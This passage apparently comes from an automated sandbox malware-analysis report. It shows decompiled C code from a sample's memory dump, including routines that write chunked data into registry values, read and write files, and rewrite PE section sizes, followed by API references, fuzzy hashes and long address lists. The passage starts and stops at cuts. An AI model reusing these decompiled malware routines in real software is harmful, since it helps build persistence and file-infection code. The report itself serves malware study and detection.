						 *(_t105 + 0x6c) =  *(_t105 + 0x6c) | 1 <<  *(_t105 + 0x7c);
					}
					 *(_t105 + 0x7c) =  *(_t105 + 0x7c) + 1;
					if( *(_t105 + 0x7c) > 0x1e) {
						goto L12;
					}
					_t101 = E0040ED03(_t98, 0x2c);
					if(_t101 != 0) {
						continue;
					}
					goto L6;
				}
				goto L12;
			}















                                                                                                                                  0x00401c60
                                                                                                                                  0x00401c64
                                                                                                                                  0x00401c6a
                                                                                                                                  0x00401c71
                                                                                                                                  0x00401c74
                                                                                                                                  0x00401c86
                                                                                                                                  0x00401c8c
                                                                                                                                  0x00401d1c
                                                                                                                                  0x00401d1c
                                                                                                                                  0x00401d1e
                                                                                                                                  0x00401d1e
                                                                                                                                  0x00401d21
                                                                                                                                  0x00401d21
                                                                                                                                  0x00401d23
                                                                                                                                  0x00401d24
                                                                                                                                  0x00401d2a
                                                                                                                                  0x00401d2e
                                                                                                                                  0x00401d30
                                                                                                                                  0x00401d30
                                                                                                                                  0x00401d33
                                                                                                                                  0x00401d33
                                                                                                                                  0x00401d35
                                                                                                                                  0x00401d36
                                                                                                                                  0x00401d42
                                                                                                                                  0x00401d6b
                                                                                                                                  0x00401d7e
                                                                                                                                  0x00401d88
                                                                                                                                  0x00401d88
                                                                                                                                  0x00401d8b
                                                                                                                                  0x00401d95
                                                                                                                                  0x00401d95
                                                                                                                                  0x00401c96
                                                                                                                                  0x00401c9d
                                                                                                                                  0x00401ca4
                                                                                                                                  0x00401cab
                                                                                                                                  0x00401cae
                                                                                                                                  0x00401cb3
                                                                                                                                  0x00401cbd
                                                                                                                                  0x00401cd2
                                                                                                                                  0x00401cd2
                                                                                                                                  0x00401ce1
                                                                                                                                  0x00401cea
                                                                                                                                  0x00401cef
                                                                                                                                  0x00401cf4
                                                                                                                                  0x00401cfe
                                                                                                                                  0x00401cfe
                                                                                                                                  0x00401d04
                                                                                                                                  0x00401d0a
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00401d14
                                                                                                                                  0x00401d1a
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00401d1a
                                                                                                                                  0x00000000

                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_pjzcupje.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: wsprintf
                                                                                                                                  • String ID: %u.%u.%u.%u.%s$localcfg
                                                                                                                                  • API String ID: 2111968516-120809033
                                                                                                                                  • Opcode ID: 013209f5f393509082169113c365cfa774f3339610439ce827356f9210efd2df
                                                                                                                                  • Instruction ID: f60862e96afe744063ef1f8e151e0253a3d6131670b42bf9f562b78b9aabf051
                                                                                                                                  • Opcode Fuzzy Hash: 013209f5f393509082169113c365cfa774f3339610439ce827356f9210efd2df
                                                                                                                                  • Instruction Fuzzy Hash: 3C41C1729042999FDB21DF798D44BEE7BE89F49310F240066FD64E3192D639EA04CBA4
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 0040E095 Relevance: 6.1, APIs: 4, Instructions: 92registryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E0040E095(void* _a4, char* _a8, intOrPtr* _a12, char* _a16, int _a20) {
				int _v8;
				char* _v12;
				void* _v16;
				char _v48;
				intOrPtr* _t34;
				int _t50;
				void* _t52;
				intOrPtr _t53;
				int _t57;
				int _t58;
				void* _t59;
				void* _t60;
				void* _t61;

				_t57 = 0;
				if(RegCreateKeyExA(_a4, _a8, 0, 0, 0, 0x20106, 0,  &_v16, 0) != 0) {
					return 0;
				}
				_v12 = _a16;
				_t34 = _a12;
				_t52 = _t34 + 1;
				do {
					_t53 =  *_t34;
					_t34 = _t34 + 1;
				} while (_t53 != 0);
				_t55 = _t34 - _t52;
				_v8 = 0;
				if(_t34 - _t52 > 0x1c) {
					_t55 = 0x1c;
				}
				E0040EE08( &_v48, _a12, _t55);
				_t50 = _a20;
				_t61 = _t60 + 0xc;
				if(_t50 <= _t57) {
					L11:
					E0040F1ED(_v8, _t59 + _t55 - 0x2c, 0xa);
					RegDeleteValueA(_v16,  &_v48);
					RegCloseKey(_v16);
					return 0 | _t50 == _t57;
				} else {
					while(1) {
						_t58 = 0xff000;
						if(_t50 < 0xff000) {
							_t58 = _t50;
						}
						E0040F1ED(_v8, _t59 + _t55 - 0x2c, 0xa);
						_t61 = _t61 + 0xc;
						if(RegSetValueExA(_v16,  &_v48, 0, 3, _v12, _t58) != 0) {
							break;
						}
						_v12 =  &(_v12[_t58]);
						_t50 = _t50 - _t58;
						_v8 = _v8 + 1;
						if(_t50 > 0) {
							continue;
						}
						break;
					}
					_t57 = 0;
					goto L11;
				}
			}
















                                                                                                                                  0x0040e09c
                                                                                                                                  0x0040e0ba
                                                                                                                                  0x00000000
                                                                                                                                  0x0040e172
                                                                                                                                  0x0040e0c3
                                                                                                                                  0x0040e0c6
                                                                                                                                  0x0040e0c9
                                                                                                                                  0x0040e0cc
                                                                                                                                  0x0040e0cc
                                                                                                                                  0x0040e0ce
                                                                                                                                  0x0040e0cf
                                                                                                                                  0x0040e0d7
                                                                                                                                  0x0040e0d9
                                                                                                                                  0x0040e0df
                                                                                                                                  0x0040e0e3
                                                                                                                                  0x0040e0e3
                                                                                                                                  0x0040e0ec
                                                                                                                                  0x0040e0f1
                                                                                                                                  0x0040e0f4
                                                                                                                                  0x0040e0f9
                                                                                                                                  0x0040e13f
                                                                                                                                  0x0040e149
                                                                                                                                  0x0040e158
                                                                                                                                  0x0040e161
                                                                                                                                  0x00000000
                                                                                                                                  0x0040e0fb
                                                                                                                                  0x0040e0fb
                                                                                                                                  0x0040e0fb
                                                                                                                                  0x0040e102
                                                                                                                                  0x0040e104
                                                                                                                                  0x0040e104
                                                                                                                                  0x0040e110
                                                                                                                                  0x0040e115
                                                                                                                                  0x0040e12f
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040e131
                                                                                                                                  0x0040e134
                                                                                                                                  0x0040e136
                                                                                                                                  0x0040e13b
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040e13b
                                                                                                                                  0x0040e13d
                                                                                                                                  0x00000000
                                                                                                                                  0x0040e13d

                                                                                                                                  APIs
                                                                                                                                  • RegCreateKeyExA.ADVAPI32(80000001,0040E2A3,00000000,00000000,00000000,00020106,00000000,0040E2A3,00000000,000000E4), ref: 0040E0B2
                                                                                                                                  • RegSetValueExA.ADVAPI32(0040E2A3,?,00000000,00000003,80000001,000FF000,?,?,?,?,000000C8,004122F8), ref: 0040E127
                                                                                                                                  • RegDeleteValueA.ADVAPI32(0040E2A3,?,?,?,?,?,000000C8,004122F8), ref: 0040E158
                                                                                                                                  • RegCloseKey.ADVAPI32(0040E2A3,?,?,?,?,000000C8,004122F8,?,?,?,?,?,?,?,?,0040E2A3), ref: 0040E161
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_pjzcupje.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Value$CloseCreateDelete
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2667537340-0
                                                                                                                                  • Opcode ID: 638dec105df7dcb1f365d34fe073c8f8fa39a9ad738abc938cf50ffa02a2619f
                                                                                                                                  • Instruction ID: af4a942e7328ea1ce2cdf979f73f75556816175b5134196b99f0fb832a21e1c2
                                                                                                                                  • Opcode Fuzzy Hash: 638dec105df7dcb1f365d34fe073c8f8fa39a9ad738abc938cf50ffa02a2619f
                                                                                                                                  • Instruction Fuzzy Hash: 2F218071A00219BBDF209FA6EC89EDF7F79EF08754F008072F904A6190E6718A64DB94
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00403F18 Relevance: 6.0, APIs: 4, Instructions: 46filesynchronizationCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E00403F18(void* _a4, void* _a8, long _a12, long _a16, long _a20) {
				struct _OVERLAPPED _v24;
				long _t30;
				void* _t31;

				_v24.Offset = _v24.Offset & 0x00000000;
				_v24.OffsetHigh = _v24.OffsetHigh & 0x00000000;
				_t30 = _a12;
				_t31 = _a16;
				_a16 = _a16 & 0x00000000;
				_v24.hEvent = _t31;
				if(WriteFile(_a4, _a8, _t30,  &_a16,  &_v24) != 0) {
					L3:
					if(_t30 != _a16) {
						L5:
						return 0;
					}
					return 1;
				}
				if(GetLastError() != 0x3e5) {
					goto L5;
				}
				WaitForSingleObject(_t31, _a20);
				if(GetOverlappedResult(_a4,  &_v24,  &_a16, 0) == 0) {
					goto L5;
				}
				goto L3;
			}






                                                                                                                                  0x00403f1e
                                                                                                                                  0x00403f22
                                                                                                                                  0x00403f27
                                                                                                                                  0x00403f2b
                                                                                                                                  0x00403f2e
                                                                                                                                  0x00403f3e
                                                                                                                                  0x00403f4c
                                                                                                                                  0x00403f7c
                                                                                                                                  0x00403f7f
                                                                                                                                  0x00403f86
                                                                                                                                  0x00000000
                                                                                                                                  0x00403f86
                                                                                                                                  0x00000000
                                                                                                                                  0x00403f83
                                                                                                                                  0x00403f59
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00403f5f
                                                                                                                                  0x00403f7a
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000

                                                                                                                                  APIs
                                                                                                                                  • WriteFile.KERNEL32(00000000,00000000,0040A3C7,00000000,00000000,000007D0,00000001), ref: 00403F44
                                                                                                                                  • GetLastError.KERNEL32 ref: 00403F4E
                                                                                                                                  • WaitForSingleObject.KERNEL32(00000004,?), ref: 00403F5F
                                                                                                                                  • GetOverlappedResult.KERNEL32(00000000,00000000,00000000,00000000), ref: 00403F72
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_pjzcupje.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorFileLastObjectOverlappedResultSingleWaitWrite
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3373104450-0
                                                                                                                                  • Opcode ID: 9f1c12f5bce82851f463a843ee7e6df514edb3150162876966f253c0cf19dcdf
                                                                                                                                  • Instruction ID: 81d5a9f64dfd66904774ebc82d2e0e48c629fa8216d99cd76bf4a5dbd4e59073
                                                                                                                                  • Opcode Fuzzy Hash: 9f1c12f5bce82851f463a843ee7e6df514edb3150162876966f253c0cf19dcdf
                                                                                                                                  • Instruction Fuzzy Hash: B9010C7291110AABDF01DF90ED44BEF7B7CEB08356F104066FA01E2190D774DA558BB6
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00403F8C Relevance: 6.0, APIs: 4, Instructions: 46filesynchronizationCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E00403F8C(void* _a4, void* _a8, long _a12, long _a16, long _a20) {
				struct _OVERLAPPED _v24;
				long _t30;
				void* _t31;

				_v24.Offset = _v24.Offset & 0x00000000;
				_v24.OffsetHigh = _v24.OffsetHigh & 0x00000000;
				_t30 = _a12;
				_t31 = _a16;
				_a16 = _a16 & 0x00000000;
				_v24.hEvent = _t31;
				if(ReadFile(_a4, _a8, _t30,  &_a16,  &_v24) != 0) {
					L3:
					if(_t30 != _a16) {
						L5:
						return 0;
					}
					return 1;
				}
				if(GetLastError() != 0x3e5) {
					goto L5;
				}
				WaitForSingleObject(_t31, _a20);
				if(GetOverlappedResult(_a4,  &_v24,  &_a16, 0) == 0) {
					goto L5;
				}
				goto L3;
			}






                                                                                                                                  0x00403f92
                                                                                                                                  0x00403f96
                                                                                                                                  0x00403f9b
                                                                                                                                  0x00403f9f
                                                                                                                                  0x00403fa2
                                                                                                                                  0x00403fb2
                                                                                                                                  0x00403fc0
                                                                                                                                  0x00403ff0
                                                                                                                                  0x00403ff3
                                                                                                                                  0x00403ffa
                                                                                                                                  0x00000000
                                                                                                                                  0x00403ffa
                                                                                                                                  0x00000000
                                                                                                                                  0x00403ff7
                                                                                                                                  0x00403fcd
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00403fd3
                                                                                                                                  0x00403fee
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000

                                                                                                                                  APIs
                                                                                                                                  • ReadFile.KERNEL32(00000000,00000000,0040A3C7,00000000,00000000,000007D0,00000001), ref: 00403FB8
                                                                                                                                  • GetLastError.KERNEL32 ref: 00403FC2
                                                                                                                                  • WaitForSingleObject.KERNEL32(00000004,?), ref: 00403FD3
                                                                                                                                  • GetOverlappedResult.KERNEL32(00000000,00000000,00000000,00000000), ref: 00403FE6
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_pjzcupje.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorFileLastObjectOverlappedReadResultSingleWait
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 888215731-0
                                                                                                                                  • Opcode ID: 7dacf77ebfc6f27f1d23b030b7b6a0e1e1f459510f641919a7ac9d23c17bf39a
                                                                                                                                  • Instruction ID: 44fd539f7a3468c5635e20a1652967c761b46accf60e77792ab8a53432005efc
                                                                                                                                  • Opcode Fuzzy Hash: 7dacf77ebfc6f27f1d23b030b7b6a0e1e1f459510f641919a7ac9d23c17bf39a
                                                                                                                                  • Instruction Fuzzy Hash: A601177291110AAFDF01DF90ED45BEF3B7CEF08356F004062F906E2090D7749A549BA6
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 0040A4C7 Relevance: 6.0, APIs: 4, Instructions: 27sleepCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E0040A4C7(intOrPtr _a4) {
				long _t3;
				LONG* _t8;
				long _t9;

				_t9 = GetTickCount();
				_t8 = _a4 + 0x5c;
				while(1) {
					_t3 = InterlockedExchange(_t8, 1);
					if(_t3 == 0) {
						break;
					}
					_t3 = GetTickCount() - _t9;
					if(_t3 < 0x1388) {
						Sleep(0);
						continue;
					}
					break;
				}
				return _t3;
			}






                                                                                                                                  0x0040a4dd
                                                                                                                                  0x0040a4df
                                                                                                                                  0x0040a4f7
                                                                                                                                  0x0040a4fa
                                                                                                                                  0x0040a4fe
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040a4e6
                                                                                                                                  0x0040a4ed
                                                                                                                                  0x0040a4f1
                                                                                                                                  0x00000000
                                                                                                                                  0x0040a4f1
                                                                                                                                  0x00000000
                                                                                                                                  0x0040a4ed
                                                                                                                                  0x0040a504

                                                                                                                                  APIs
                                                                                                                                  • GetTickCount.KERNEL32 ref: 0040A4D1
                                                                                                                                  • GetTickCount.KERNEL32 ref: 0040A4E4
                                                                                                                                  • Sleep.KERNEL32(00000000,?,0040C2E9,0040C4E0,00000000,localcfg,?,0040C4E0,00413588,00408810), ref: 0040A4F1
                                                                                                                                  • InterlockedExchange.KERNEL32(?,00000001), ref: 0040A4FA
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_pjzcupje.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CountTick$ExchangeInterlockedSleep
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2207858713-0
                                                                                                                                  • Opcode ID: 4cd0520482080c365333fb8aab0c55e365768e1349ae612301bcb729eb943e51
                                                                                                                                  • Instruction ID: a5473328a7e7118e9aede6741b06156156ec1e7733dd8d1ec56465b12724d56e
                                                                                                                                  • Opcode Fuzzy Hash: 4cd0520482080c365333fb8aab0c55e365768e1349ae612301bcb729eb943e51
                                                                                                                                  • Instruction Fuzzy Hash: 7DE0863720131567C6005BA5BD84FAA7B98AB4D761F164072FB08E3280D6AAA99145BF
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00404E92 Relevance: 6.0, APIs: 4, Instructions: 27sleepCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E00404E92(void* __ecx) {
				long _t2;
				void* _t7;
				LONG* _t8;
				long _t9;

				_t7 = __ecx;
				_t9 = GetTickCount();
				_t8 = _t7 + 4;
				while(1) {
					_t2 = InterlockedExchange(_t8, 1);
					if(_t2 == 0) {
						break;
					}
					_t2 = GetTickCount() - _t9;
					if(_t2 < 0x2710) {
						Sleep(0xa);
						continue;
					}
					break;
				}
				return _t2;
			}







                                                                                                                                  0x00404e9c
                                                                                                                                  0x00404ea6
                                                                                                                                  0x00404ea8
                                                                                                                                  0x00404ec0
                                                                                                                                  0x00404ec3
                                                                                                                                  0x00404ec7
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00404eaf
                                                                                                                                  0x00404eb6
                                                                                                                                  0x00404eba
                                                                                                                                  0x00000000
                                                                                                                                  0x00404eba
                                                                                                                                  0x00000000
                                                                                                                                  0x00404eb6
                                                                                                                                  0x00404ecd

                                                                                                                                  APIs
                                                                                                                                  • GetTickCount.KERNEL32 ref: 00404E9E
                                                                                                                                  • GetTickCount.KERNEL32 ref: 00404EAD
                                                                                                                                  • Sleep.KERNEL32(0000000A,?,00000001), ref: 00404EBA
                                                                                                                                  • InterlockedExchange.KERNEL32(?,00000001), ref: 00404EC3
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_pjzcupje.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CountTick$ExchangeInterlockedSleep
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2207858713-0
                                                                                                                                  • Opcode ID: 574f7709b1251d8d4516fda0e718bcbaf1509578ef326d685951742d25275ed5
                                                                                                                                  • Instruction ID: 0be737a4b1ecb403dd0b6a084e6b0260aeafc6613011e157a8d43e60cd200510
                                                                                                                                  • Opcode Fuzzy Hash: 574f7709b1251d8d4516fda0e718bcbaf1509578ef326d685951742d25275ed5
                                                                                                                                  • Instruction Fuzzy Hash: 6AE086B620121457D61027B9FD84F966A89AB9A361F010532F70DE21C0C6AA989345FD
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00404BD1 Relevance: 6.0, APIs: 4, Instructions: 27sleepCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E00404BD1(void* __ecx) {
				long _t2;
				void* _t7;
				LONG* _t8;
				long _t9;

				_t7 = __ecx;
				_t9 = GetTickCount();
				_t8 = _t7 + 0xc;
				while(1) {
					_t2 = InterlockedExchange(_t8, 1);
					if(_t2 == 0) {
						break;
					}
					_t2 = GetTickCount() - _t9;
					if(_t2 < 0x1388) {
						Sleep(0);
						continue;
					}
					break;
				}
				return _t2;
			}







                                                                                                                                  0x00404bdb
                                                                                                                                  0x00404be5
                                                                                                                                  0x00404be7
                                                                                                                                  0x00404bff
                                                                                                                                  0x00404c02
                                                                                                                                  0x00404c06
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00404bee
                                                                                                                                  0x00404bf5
                                                                                                                                  0x00404bf9
                                                                                                                                  0x00000000
                                                                                                                                  0x00404bf9
                                                                                                                                  0x00000000
                                                                                                                                  0x00404bf5
                                                                                                                                  0x00404c0c

                                                                                                                                  APIs
                                                                                                                                  • GetTickCount.KERNEL32 ref: 00404BDD
                                                                                                                                  • GetTickCount.KERNEL32 ref: 00404BEC
                                                                                                                                  • Sleep.KERNEL32(00000000,?,?,?,00000004,004050F2), ref: 00404BF9
                                                                                                                                  • InterlockedExchange.KERNEL32(-00000008,00000001), ref: 00404C02
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_pjzcupje.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CountTick$ExchangeInterlockedSleep
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2207858713-0
                                                                                                                                  • Opcode ID: 1ad869c4a91a2c80201434bef060b196597965ff38d45849583c02ff4b747b44
                                                                                                                                  • Instruction ID: c27c4130c4fb343c81443d6f5f76baf76a02980c1ff66e5fdc0d00212ab38f61
                                                                                                                                  • Opcode Fuzzy Hash: 1ad869c4a91a2c80201434bef060b196597965ff38d45849583c02ff4b747b44
                                                                                                                                  • Instruction Fuzzy Hash: FCE0867624521457D61027A66D80FA67BA89B99361F064073F70CE2190C9AAE48141BD
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 004030FA Relevance: 6.0, APIs: 4, Instructions: 23sleepCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E004030FA(LONG* _a4) {
				long _t3;
				long _t5;

				_t5 = GetTickCount();
				while(1) {
					_t3 = InterlockedExchange(_a4, 1);
					if(_t3 == 0) {
						break;
					}
					_t3 = GetTickCount() - _t5;
					if(_t3 < 0x1388) {
						Sleep(0);
						continue;
					}
					break;
				}
				return _t3;
			}





                                                                                                                                  0x0040310b
                                                                                                                                  0x00403122
                                                                                                                                  0x00403128
                                                                                                                                  0x0040312c
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00403111
                                                                                                                                  0x00403118
                                                                                                                                  0x0040311c
                                                                                                                                  0x00000000
                                                                                                                                  0x0040311c
                                                                                                                                  0x00000000
                                                                                                                                  0x00403118
                                                                                                                                  0x00403131

                                                                                                                                  APIs
                                                                                                                                  • GetTickCount.KERNEL32 ref: 00403103
                                                                                                                                  • GetTickCount.KERNEL32 ref: 0040310F
                                                                                                                                  • Sleep.KERNEL32(00000000), ref: 0040311C
                                                                                                                                  • InterlockedExchange.KERNEL32(?,00000001), ref: 00403128
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_pjzcupje.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CountTick$ExchangeInterlockedSleep
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2207858713-0
                                                                                                                                  • Opcode ID: 5475aadbbb6481cfb66701b566d3724b8cf1f0baef2ba10e865a3ab4c750e63b
                                                                                                                                  • Instruction ID: 9edc608f4d32da9f9de986fa19dd3c9deb40157c310ade5cfb00ff6fe32d5b40
                                                                                                                                  • Opcode Fuzzy Hash: 5475aadbbb6481cfb66701b566d3724b8cf1f0baef2ba10e865a3ab4c750e63b
                                                                                                                                  • Instruction Fuzzy Hash: 51E0C235200215ABDB00AF75BD44B8A6E9EDF8C762F014432F205EA1E0C9F44D51897A
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00406987 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 92fileCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 97%
                                                                                                                                  			E00406987(void* __ecx, void* _a4, void* _a8, intOrPtr _a12, signed int _a16) {
				long _v8;
				long _v12;
				signed int _t50;
				signed int _t53;
				int _t59;
				signed int _t60;
				long _t68;
				signed int _t74;
				void* _t78;
				void* _t85;

				_t78 = _a8;
				_t48 =  *((intOrPtr*)(_t78 + 0x3c)) + _t78;
				_t7 =  &_a16; // 0x406b2c
				_t85 = (( *( *((intOrPtr*)(_t78 + 0x3c)) + _t78 + 6) & 0x0000ffff) - 1) * 0x28 + ( *(_t48 + 0x14) & 0x0000ffff) + _t48 + 0x18;
				_t68 =  *(_t85 + 0x14);
				_t50 =  *_t7 - _t68;
				_v8 = _t50;
				if(_t68 >= _a12) {
					L5:
					_a16 = _a16 & 0x00000000;
				} else {
					_t74 =  *(_t85 + 0x10);
					if(_t74 == 0) {
						goto L5;
					} else {
						_v12 = _t74;
						_a16 = _t50 / _t74;
						if(_a16 < 1) {
							_a16 = 1;
						}
						_t20 =  &_a16; // 0x406b2c
						 *(_t85 + 0x10) =  *_t20 * _t74;
					}
				}
				_v8 = _v8 & 0x00000000;
				if(WriteFile(_a4, _t78, _t68,  &_v8, 0) == 0 || _v8 != _t68) {
					if(_a16 != 0) {
						 *(_t85 + 0x10) = _v12;
					}
					_t53 = 0;
				} else {
					if(_a16 == 0) {
						L13:
						_t53 = _t68;
					} else {
						 *(_t85 + 0x10) = _v12;
						while(1) {
							_v8 = _v8 & 0x00000000;
							_t59 = WriteFile(_a4, _a8 +  *(_t85 + 0x14), _v12,  &_v8, 0);
							_t60 = _v8;
							if(_t59 == 0 || _t60 != _v12) {
								break;
							}
							_t68 = _t68 + _t60;
							_t41 =  &_a16;
							 *_t41 = _a16 - 1;
							if( *_t41 != 0) {
								continue;
							} else {
								goto L13;
							}
							goto L18;
						}
						asm("sbb eax, eax");
						_t53 =  !_t60 & _t68 + _t60;
					}
				}
				L18:
				return _t53;
			}













                                                                                                                                  0x0040698f
                                                                                                                                  0x00406995
                                                                                                                                  0x004069a7
                                                                                                                                  0x004069aa
                                                                                                                                  0x004069ac
                                                                                                                                  0x004069af
                                                                                                                                  0x004069b1
                                                                                                                                  0x004069b7
                                                                                                                                  0x004069e0
                                                                                                                                  0x004069e0
                                                                                                                                  0x004069b9
                                                                                                                                  0x004069b9
                                                                                                                                  0x004069be
                                                                                                                                  0x00000000
                                                                                                                                  0x004069c0
                                                                                                                                  0x004069c4
                                                                                                                                  0x004069c7
                                                                                                                                  0x004069d0
                                                                                                                                  0x004069d2
                                                                                                                                  0x004069d2
                                                                                                                                  0x004069d5
                                                                                                                                  0x004069db
                                                                                                                                  0x004069db
                                                                                                                                  0x004069be
                                                                                                                                  0x004069e4
                                                                                                                                  0x004069fd
                                                                                                                                  0x00406a51
                                                                                                                                  0x00406a56
                                                                                                                                  0x00406a56
                                                                                                                                  0x00406a59
                                                                                                                                  0x00406a04
                                                                                                                                  0x00406a08
                                                                                                                                  0x00406a3c
                                                                                                                                  0x00406a3c
                                                                                                                                  0x00406a0a
                                                                                                                                  0x00406a0d
                                                                                                                                  0x00406a10
                                                                                                                                  0x00406a10
                                                                                                                                  0x00406a27
                                                                                                                                  0x00406a2b
                                                                                                                                  0x00406a2e
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00406a35
                                                                                                                                  0x00406a37
                                                                                                                                  0x00406a37
                                                                                                                                  0x00406a3a
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00406a3a
                                                                                                                                  0x00406a45
                                                                                                                                  0x00406a49
                                                                                                                                  0x00406a49
                                                                                                                                  0x00406a08
                                                                                                                                  0x00406a5b
                                                                                                                                  0x00406a5f

                                                                                                                                  APIs
                                                                                                                                  • WriteFile.KERNEL32(00409A60,?,?,00000000,00000000,00409A60,?,00000000), ref: 004069F9
                                                                                                                                  • WriteFile.KERNEL32(00409A60,?,00409A60,00000000,00000000), ref: 00406A27
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_pjzcupje.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FileWrite
                                                                                                                                  • String ID: ,k@
                                                                                                                                  • API String ID: 3934441357-1053005162
                                                                                                                                  • Opcode ID: e4aff9389b963f63373f6495f6f2d31144d691977fa3f05a849364ed3536fcbf
